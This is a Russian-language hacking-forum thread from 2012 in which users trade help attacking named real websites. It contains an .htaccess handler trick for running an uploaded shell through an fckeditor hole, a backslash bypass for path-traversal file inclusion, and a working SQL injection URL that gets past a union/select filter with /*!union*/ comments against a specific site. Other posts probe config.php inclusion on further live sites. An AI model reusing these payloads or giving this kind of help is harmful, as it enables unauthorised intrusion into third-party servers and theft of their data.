 |
|
17.12.2012, 01:58
|
|
Новичок
Регистрация: 15.12.2012
Сообщений: 1
С нами:
7057046
Репутация:
0
|
|
Нужна Ваша помощь.
Нашел уязвимость на неком сайте в fckeditor. Можно заливать файлы все кроме php. Примечательно, что можно залить файл .htaccess даже. Я пробовал залить шелл с произвольным расширением в связке к примеру :
Код:
ForceType application/x-httpd-php SetHandler application/x-httpd-php
Но, вот какая незадача, он вместо запуска скачивается.
Прошу Вашей помощи.
Ccылка на уязвимость
Ссылка на файлы загруженные через едитор
Вобщем думаю знатокам будет интересно. Жду Ваших советов
|
|
|
17.12.2012, 18:01
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
С нами:
10362626
Репутация:
327
|
|
вопрос по htaccess
могу ли я выставлять права в фаиле htaccess
лежащем в деректории /var/html/www/1234
на директорию /var/html/www/12345
и как если да?
|
|
|
|
17.12.2012, 18:43
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от ReVOLVeR
вопрос по htaccess
могу ли я выставлять права в фаиле htaccess
лежащем в деректории /var/html/www/1234
на директорию /var/html/www/12345
и как если да?
нет. Не можешь. Только на дочерние.
|
|
|
|
17.12.2012, 19:14
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
С нами:
9100829
Репутация:
0
|
|
Как обойти фильтрацию для успешной PHP injection, если иклюдить файл, например:
http://site/vulnerable.php?file=inj.php
а надо
http://site/vulnerable.php?file=../../inj.php
+ фильтрация такова:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]escape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]]))[/COLOR][/COLOR]
|
|
|
|
17.12.2012, 21:24
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Qwert321
Как обойти фильтрацию для успешной PHP injection, если иклюдить файл, например:
http://site/vulnerable.php?file=inj.php
а надо
http://site/vulnerable.php?file=../../inj.php
+ фильтрация такова:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]escape[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]]))[/COLOR][/COLOR]
Если сервер на Windows то может помочь обратный слэш \
|
|
|
|
17.12.2012, 21:38
|
|
Постоянный
Регистрация: 05.09.2012
Сообщений: 388
С нами:
7202486
Репутация:
124
|
|
Как обойти фильтр union или select (как определить что именно фильтруется? group by нормально проходят)?
Не хочу быть навязчивым, но сейчас результат моего скрипта ~20 предполагаемых скулей(15 из них подтверждаются, но "наличие" скулей в youtube и hpc напрягает ) из 230 линков. Это нормальный показатель?
Заранее благодарен.
|
|
|
|
17.12.2012, 21:47
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Сообщение от FunOfGun
Как обойти фильтр union или select (как определить что именно фильтруется? group by нормально проходят)?
Может линк покажите?
|
|
|
|
17.12.2012, 21:51
|
|
Постоянный
Регистрация: 05.09.2012
Сообщений: 388
С нами:
7202486
Репутация:
124
|
|
Сообщение от WendM
Может линк покажите?
http://www.currents olutions.com/articles.php?id=8%20union%20select%201,2,3,4%20--
|
|
|
|
17.12.2012, 22:00
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 44
С нами:
7519286
Репутация:
3
|
|
Сообщение от FunOfGun
http://www.currents olutions.com/articles.php?id=8%20union%20select%201,2,3,4%20--
Собственно все просто, просто побольше читать...
Код:
http://www.currentsolutions.com/articles.php?id=99999.9+/*!union*/(select+1,2,3,4)+--+
|
|
|
|
18.12.2012, 14:34
|
|
Познающий
Регистрация: 26.10.2012
Сообщений: 54
С нами:
7129046
Репутация:
0
|
|
http://flowap.ru/download/index.php?...ile=config.php
Я так понимаю это php инж. Но файл кфг пустой, что дальше делать??
http://io.nios.ru/index.php?showpage&page=config.php
И вот тут подскажите что делать дальше
|
|
|
|
|
|
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Линейный вид
